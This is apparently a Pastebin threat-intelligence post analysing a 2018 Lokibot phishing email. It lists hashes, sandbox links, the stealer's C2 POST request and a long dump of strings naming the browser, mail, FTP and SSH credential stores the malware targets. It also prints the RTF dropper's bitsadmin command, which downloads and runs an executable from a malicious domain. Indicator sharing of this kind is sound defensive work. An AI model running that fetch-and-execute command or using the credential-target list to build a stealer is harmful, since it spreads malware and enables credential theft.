API tools faq
paste
Advertisement
Neonprimetime

2018-04-19 Lokibot sample invoice email

Neonprimetime
Apr 19th, 2018
2,958
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.16 KB | None | 0 0
raw download clone embed print report
  1. Found by @neonprimetime from 4/10/2018
  2. Subject Priority :Invoice, PL & BL(Validate and confirm for final payment)
  3. Attachment L5643290HS.doc
  4. MD5 Checksum 33c06f02d43545be1b8baa567775402d
  5. https://www.reverse.it/sample/729fdbb4b840234dc48fd13770d6811908aac73d3e76228a9aa02a8f776d9cbf?environmentId=100
  6. sending ip: 104.47.33.228 (outlook.com)
  7.  
  8. word doc is actually RTF that runs bitsadmin to download loki payload
  9.  
  10. cmd.exe /c bitsadmin /transfer sY /priority foreground http://tpreiastephenville.com/jazz.exe %USERPROFILE%\rW.exe && start %USERPROFILE%\rW.exe
  11. md5,29BEE3FCCFE036A03281B7940718D38F
  12. https://www.reverse.it/sample/a66f989e58ada2eff729ac2032ff71a159c521e7372373f4a1c1cf13f8ae2f0c?environmentId=100
  13.  
  14.  
  15. it is lokibot (here's another example to compare: https://pastebin.com/pArSzS01 )
  16.  
  17. -------------------------------
  18. interesting network connections
  19. -------------------------------
  20. http posts to 216.222.194.136:80
  21. POST /wp-content/along/five/fre.php HTTP/1.0
  22. User-Agent: Mozilla/4.08 (Charon; Inferno)
  23. Host: alongsidecoach.com
  24. Accept: */*
  25. Content-Type: application/octet-stream
  26. Content-Encoding: binary
  27. Content-Key: E292D1AA
  28. Content-Length: 159
  29. Connection: close
  30. ..(.......ckav.ru.
  31.  
  32. --------------------------------
  33. interesting in-memory strings
  34. --------------------------------
  35. 0x4a0074 (55): http://alongsidecoach.com/wp-content/along/five/fre.php
  36. 0x2fd82e6 (26): Comodo\Dragon
  37. 0x2fd8302 (44): MapleStudio\ChromePlus
  38. 0x2fd8332 (26): Google\Chrome
  39. 0x2fd8396 (26): Titan Browser
  40. 0x2fd83be (40): Yandex\YandexBrowser
  41. 0x2fd83ea (40): Epic Privacy Browser
  42. 0x2fd8416 (28): CocCoc\Browser
  43. 0x2fd8446 (30): Comodo\Chromodo
  44. 0x2fd847a (26): Coowon\Coowon
  45. 0x2fd8496 (30): Mustang Browser
  46. 0x2fd84b6 (36): 360Browser\Browser
  47. 0x2fd84de (40): CatalinaGroup\Citrio
  48. 0x2fd850a (34): Google\Chrome SxS
  49. 0x2fd854e (44): \Opera\Opera Next\data
  50. 0x2fd857e (56): \Opera Software\Opera Stable
  51. 0x2fd85ba (102): \Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer
  52. 0x2fd8622 (104): \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
  53. 0x2fd868e (24): vaultcli.dll
  54. 0x2fd86aa (19): VaultEnumerateItems
  55. 0x2fd86be (20): VaultEnumerateVaults
  56. 0x2fd86e2 (12): VaultGetItem
  57. 0x2fd86f2 (14): VaultOpenVault
  58. 0x2fd8702 (15): VaultCloseVault
  59. 0x2fd8712 (116): Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  60. 0x2fd87b2 (92): Software\Microsoft\Internet Explorer\TypedURLs
  61. 0x2fd881a (84): SELECT encryptedUsername, encryptedPassword, formSubmitURL, hostname FROM moz_logins
  62. 0x2fd888e (17): encryptedUsername
  63. 0x2fd88a2 (17): encryptedPassword
  64. 0x2fd88b6 (28): %s\logins.json
  65. 0x2fd88d6 (22): %s\prefs.js
  66. 0x2fd88ee (34): %s\signons.sqlite
  67. 0x2fd8912 (22): signons.txt
  68. 0x2fd892a (24): signons2.txt
  69. 0x2fd8946 (24): signons3.txt
  70. 0x2fd8962 (62): %s\Mozilla\Firefox\profiles.ini
  71. 0x2fd89a2 (60): %s\Mozilla\Firefox\Profiles\%s
  72. 0x2fd89e2 (66): %s\Mozilla\SeaMonkey\profiles.ini
  73. 0x2fd8a2a (64): %s\Mozilla\SeaMonkey\Profiles\%s
  74. 0x2fd8a6e (58): %s\Flock\Browser\profiles.ini
  75. 0x2fd8aaa (56): %s\Flock\Browser\Profiles\%s
  76. 0x2fd8ae6 (54): %s\Thunderbird\profiles.ini
  77. 0x2fd8b1e (52): %s\Thunderbird\Profiles\%s
  78. 0x2fd8b56 (48): %s\K-Meleon\profiles.ini
  79. 0x2fd8b8a (28): %s\K-Meleon\%s
  80. 0x2fd8baa (64): %s\Comodo\IceDragon\profiles.ini
  81. 0x2fd8bf2 (62): %s\Comodo\IceDragon\Profiles\%s
  82. 0x2fd8c32 (92): %s\NETGATE Technologies\BlackHawk\profiles.ini
  83. 0x2fd8c92 (90): %s\NETGATE Technologies\BlackHawk\Profiles\%s
  84. 0x2fd8cee (46): %s\Postbox\profiles.ini
  85. 0x2fd8d1e (44): %s\Postbox\Profiles\%s
  86. 0x2fd8d52 (74): %s\8pecxstudios\Cyberfox\profiles.ini
  87. 0x2fd8da2 (72): %s\8pecxstudios\Cyberfox\Profiles\%s
  88. 0x2fd8df2 (94): %s\Moonchild Productions\Pale Moon\profiles.ini
  89. 0x2fd8e52 (92): %s\Moonchild Productions\Pale Moon\Profiles\%s
  90. 0x2fd8eb2 (50): %s\FossaMail\profiles.ini
  91. 0x2fd8ee6 (48): %s\FossaMail\Profiles\%s
  92. 0x2fd8f1a (150): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data
  93. 0x2fd8ff6 (22): %s\nss3.dll
  94. 0x2fd901a (12): NSS_Shutdown
  95. 0x2fd902a (23): PK11_GetInternalKeySlot
  96. 0x2fd9042 (13): PK11_FreeSlot
  97. 0x2fd9052 (17): PK11_Authenticate
  98. 0x2fd9066 (15): PK11SDR_Decrypt
  99. 0x2fd9076 (22): PK11_CheckUserPassword
  100. 0x2fd908e (16): SECITEM_FreeItem
  101. 0x2fd90a2 (22): sqlite3.dll
  102. 0x2fd90ba (28): mozsqlite3.dll
  103. 0x2fd90ee (16): sqlite3_finalize
  104. 0x2fd9102 (12): sqlite3_step
  105. 0x2fd9112 (13): sqlite3_close
  106. 0x2fd9122 (19): sqlite3_column_text
  107. 0x2fd9136 (14): sqlite3_open16
  108. 0x2fd9146 (18): sqlite3_prepare_v2
  109. 0x2fd915a (15): sqlite3_prepare
  110. 0x2fd916a (28): CurrentVersion
  111. 0x2fd918a (64): SOFTWARE\Mozilla\Mozilla Firefox
  112. 0x2fd91d6 (20): %s\%s\Main
  113. 0x2fd91ee (34): Install Directory
  114. 0x2fd922a (72): SOFTWARE\Mozilla\Mozilla Thunderbird
  115. 0x2fd9276 (52): SOFTWARE\Mozilla\FossaMail
  116. 0x2fd92ae (48): SOFTWARE\Postbox\Postbox
  117. 0x2fd92e2 (44): SOFTWARE\Mozilla\Flock
  118. 0x2fd9312 (40): SOFTWARE\Flock\Flock
  119. 0x2fd934a (28): %ProgramW6432%
  120. 0x2fd936a (42): %s\NETGATE\Black Hawk
  121. 0x2fd9396 (52): SOFTWARE\Mozilla\Pale Moon
  122. 0x2fd93d2 (140): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
  123. 0x2fd9462 (34): SOFTWARE\K-Meleon
  124. 0x2fd949a (72): SOFTWARE\ComodoGroup\IceDragon\Setup
  125. 0x2fd94fa (64): SOFTWARE\8pecxstudios\Cyberfox86
  126. 0x2fd953e (60): SOFTWARE\8pecxstudios\Cyberfox
  127. 0x2fd957e (60): SOFTWARE\mozilla.org\SeaMonkey
  128. 0x2fd95be (38): %s\Mozilla\Profiles
  129. 0x2fd95ee (52): SOFTWARE\Mozilla\SeaMonkey
  130. 0x2fd9626 (50): SOFTWARE\Mozilla\Waterfox
  131. 0x2fd9672 (22): firefox.exe
  132. 0x2fd9696 (24): kernel32.dll
  133. 0x2fd96b2 (11): CloseHandle
  134. 0x2fd96be (11): CreateFileW
  135. 0x2fd96d6 (11): ExitProcess
  136. 0x2fd96e2 (22): Crypt32.dll
  137. 0x2fd96fa (20): CryptStringToBinaryA
  138. 0x2fd9712 (22): Shlwapi.dll
  139. 0x2fd9732 (14): GetProcAddress
  140. 0x2fd9742 (12): LoadLibraryW
  141. 0x2fd977a (39): X!2$6*9(SKiasb+!v<.qF58_qwe~QsRTYvdeTYb
  142. 0x2fd97a2 (42): form_password_control
  143. 0x2fd97ce (42): form_username_control
  144. 0x2fd97fa (108): Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
  145. 0x2fd986a (84): %s\QupZilla\profiles\default\browsedata.db
  146. 0x2fd98ee (20): InstallDir
  147. 0x2fd990a (72): SOFTWARE\Apple Computer, Inc.\Safari
  148. 0x2fd995a (88): %s\Apple Computer\Preferences\keychain.plist
  149. 0x2fd99ba (78): %s\Apple Application Support\plutil.exe
  150. 0x2fd9a16 (54): -convert xml1 -s -o %s "%s"
  151. 0x2fd9a4e (56): %s\Data\AccCfg\Accounts.tdat
  152. 0x2fd9a8a (20): %s\Storage
  153. 0x2fd9aa2 (24): Account.rec0
  154. 0x2fd9abe (30): %s\Foxmail\mail
  155. 0x2fd9aea (26): %SYSTEMDRIVE%
  156. 0x2fd9b1a (24): EmailAddress
  157. 0x2fd9b36 (20): Technology
  158. 0x2fd9b72 (20): PopAccount
  159. 0x2fd9b8a (22): PopPassword
  160. 0x2fd9ba2 (20): SmtpServer
  161. 0x2fd9bce (22): SmtpAccount
  162. 0x2fd9be6 (24): SmtpPassword
  163. 0x2fd9c02 (62): Software\IncrediMail\Identities
  164. 0x2fd9c66 (20): POP3Server
  165. 0x2fd9c9e (36): SMTP Email Address
  166. 0x2fd9cc6 (22): SMTP Server
  167. 0x2fd9cde (28): SMTP User Name
  168. 0x2fd9d12 (22): POP3 Server
  169. 0x2fd9d2a (28): POP3 User Name
  170. 0x2fd9d5e (36): NNTP Email Address
  171. 0x2fd9d86 (28): NNTP User Name
  172. 0x2fd9da6 (22): NNTP Server
  173. 0x2fd9dbe (22): IMAP Server
  174. 0x2fd9dd6 (28): IMAP User Name
  175. 0x2fd9e1e (30): HTTP Server URL
  176. 0x2fd9e3e (36): HTTPMail User Name
  177. 0x2fd9e66 (30): HTTPMail Server
  178. 0x2fd9ec2 (28): POP3 Password2
  179. 0x2fd9ee2 (28): IMAP Password2
  180. 0x2fd9f02 (28): NNTP Password2
  181. 0x2fd9f22 (36): HTTPMail Password2
  182. 0x2fd9f4a (28): SMTP Password2
  183. 0x2fd9f6a (26): POP3 Password
  184. 0x2fd9f86 (26): IMAP Password
  185. 0x2fd9fa2 (26): NNTP Password
  186. 0x2fd9fbe (26): HTTP Password
  187. 0x2fd9fda (26): SMTP Password
  188. 0x2fd9ffa (178): Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
  189. 0x2fda0b2 (110): Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  190. 0x2fda122 (110): Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
  191. 0x2fda192 (30): %s\32BitFtp.TMP
  192. 0x2fda1b2 (30): %s\32BitFtp.ini
  193. 0x2fda1d2 (54): %s\Estsoft\ALFTP\ESTdb2.dat
  194. 0x2fda20a (22): %s\site.xml
  195. 0x2fda222 (46): %s\BitKinex\bitkinex.ds
  196. 0x2fda26e (30): LastUsedProfile
  197. 0x2fda28e (56): Software\Bitvise\BvSshClient
  198. 0x2fda2ca (40): %s\BlazeFtp\site.dat
  199. 0x2fda2fa (72): Software\FlashPeak\BlazeFtp\Settings
  200. 0x2fda346 (24): LastPassword
  201. 0x2fda376 (22): LastAddress
  202. 0x2fda3da (88): Software\NCH Software\ClassicFTP\FTPAccounts
  203. 0x2fda456 (24): %s\Cyberduck
  204. 0x2fda472 (22): user.config
  205. 0x2fda48a (30): %s\iterate_GmbH
  206. 0x2fda4aa (30): %s\EasyFTP\data
  207. 0x2fda4f2 (26): %s\ExpanDrive
  208. 0x2fda50e (26): *favorites.js
  209. 0x2fda56a (60): Software\Far\Plugins\FTP\Hosts
  210. 0x2fda5aa (62): Software\Far2\Plugins\FTP\Hosts
  211. 0x2fda5ea (148): %s\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
  212. 0x2fda682 (52): %s\FileZilla\Filezilla.xml
  213. 0x2fda6ba (52): %s\FileZilla\filezilla.xml
  214. 0x2fda6f2 (60): %s\FileZilla\recentservers.xml
  215. 0x2fda732 (56): %s\FileZilla\sitemanager.xml
  216. 0x2fda76e (22): %s\FlashFXP
  217. 0x2fda786 (20): *Sites.dat
  218. 0x2fda79e (20): *quick.dat
  219. 0x2fda7ca (22): FtpUserName
  220. 0x2fda7e2 (22): FtpPassword
  221. 0x2fda7fa (24): _FtpPassword
  222. 0x2fda81a (72): Software\NCH Software\Fling\Accounts
  223. 0x2fda86a (78): %s\FreshWebmaster\FreshFTP\FtpSites.SMF
  224. 0x2fda8ba (46): %s\FTPBox\profiles.conf
  225. 0x2fda8ea (64): %s\FTPGetter\Profile\servers.xml
  226. 0x2fda92e (48): %s\FTPGetter\servers.xml
  227. 0x2fda962 (50): %s\FTPInfo\ServerList.xml
  228. 0x2fda996 (50): %s\FTPInfo\ServerList.cfg
  229. 0x2fda9ca (56): %s\FTP Navigator\Ftplist.txt
  230. 0x2fdaa06 (40): %s\FTP Now\sites.xml
  231. 0x2fdaa32 (48): %s\FTPShell\ftpshell.fsi
  232. 0x2fdaa6a (64): %s\.config\fullsync\profiles.xml
  233. 0x2fdaaae (44): %s\DeluxeFTP\sites.xml
  234. 0x2fdaae2 (66): %s\GoFTP\settings\Connections.txt
  235. 0x2fdab5a (36): %s\%s%i\encPwd.jsd
  236. 0x2fdab82 (78): %s\%s%i\data\settings\sshProfiles-j.jsd
  237. 0x2fdabd2 (78): %s\%s%i\data\settings\ftpProfiles-j.jsd
  238. 0x2fdac46 (60): Software\LinasFTP\Site Manager
  239. 0x2fdac86 (52): %s\oZone3D\MyFTP\myftp.ini
  240. 0x2fdacbe (46): %s\NetDrive\NDSites.ini
  241. 0x2fdacee (46): %s\NetDrive2\drives.dat
  242. 0x2fdad22 (64): %s\Fastream NETFile\My FTP Links
  243. 0x2fdad6a (66): %s\NexusFile\userdata\ftpsite.ini
  244. 0x2fdadae (48): %s\NexusFile\ftpsite.ini
  245. 0x2fdade2 (64): %s\INSoftware\NovaFTP\NovaFTP.db
  246. 0x2fdae2a (90): %s\Notepad++\plugins\config\NppFTP\NppFTP.xml
  247. 0x2fdae8a (78): %s\Odin Secure FTP Expert\QFDefault.QFQ
  248. 0x2fdaeda (76): %s\Odin Secure FTP Expert\SiteInfo.QFP
  249. 0x2fdaf2a (26): PublicKeyFile
  250. 0x2fdaf46 (24): TerminalType
  251. 0x2fdaf62 (20): PortNumber
  252. 0x2fdaf7a (64): Software\9bis.com\KiTTY\Sessions
  253. 0x2fdafc2 (70): Software\SimonTatham\PuTTY\Sessions
  254. 0x2fdb026 (20): lsasrv.dll
  255. 0x2fdb03e (22): LsaICryptUnprotectData
  256. 0x2fdb072 (48): %s\Microsoft\Credentials
  257. 0x2fdb0a6 (22): Config Path
  258. 0x2fdb0be (50): Software\VanDyke\SecureFX
  259. 0x2fdb0f2 (22): %s\Sessions
  260. 0x2fdb13a (30): %s\SftpNetDrive
  261. 0x2fdb16a (84): %s\Sherrod Computers\sherrod FTP\favorites
  262. 0x2fdb1c2 (52): #document.favoriteManager*
  263. 0x2fdb1fa (22): %s\SmartFTP
  264. 0x2fdb222 (44): %s\Staff-FTP\sites.ini
  265. 0x2fdb252 (44): %s\Steed\bookmarks.txt
  266. 0x2fdb282 (26): %s\SuperPutty
  267. 0x2fdb30a (20): {.:CRED:.}
  268. 0x2fdb356 (24): %s\Syncovery
  269. 0x2fdb372 (26): Syncovery.ini
  270. 0x2fdb38e (28): %s\wcx_ftp.ini
  271. 0x2fdb3ae (44): %s\GHISLER\wcx_ftp.ini
  272. 0x2fdb3de (20): FtpIniName
  273. 0x2fdb3fa (64): Software\Ghisler\Total Commander
  274. 0x2fdb43e (42): %s\UltraFXP\sites.xml
  275. 0x2fdb46a (60): %s\WinFtp Client\Favorites.dat
  276. 0x2fdb4aa (20): FSProtocol
  277. 0x2fdb4c2 (46): Software\Martin Prikryl
  278. 0x2fdb4f2 (40): %s\WS_FTP\WS_FTP.INI
  279. 0x2fdb51e (26): %s\WS_FTP.INI
  280. 0x2fdb53a (22): %s\Ipswitch
  281. 0x2fdb552 (20): ws_ftp.ini
  282. 0x2fdb56a (52): %s\NetSarang\Xftp\Sessions
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!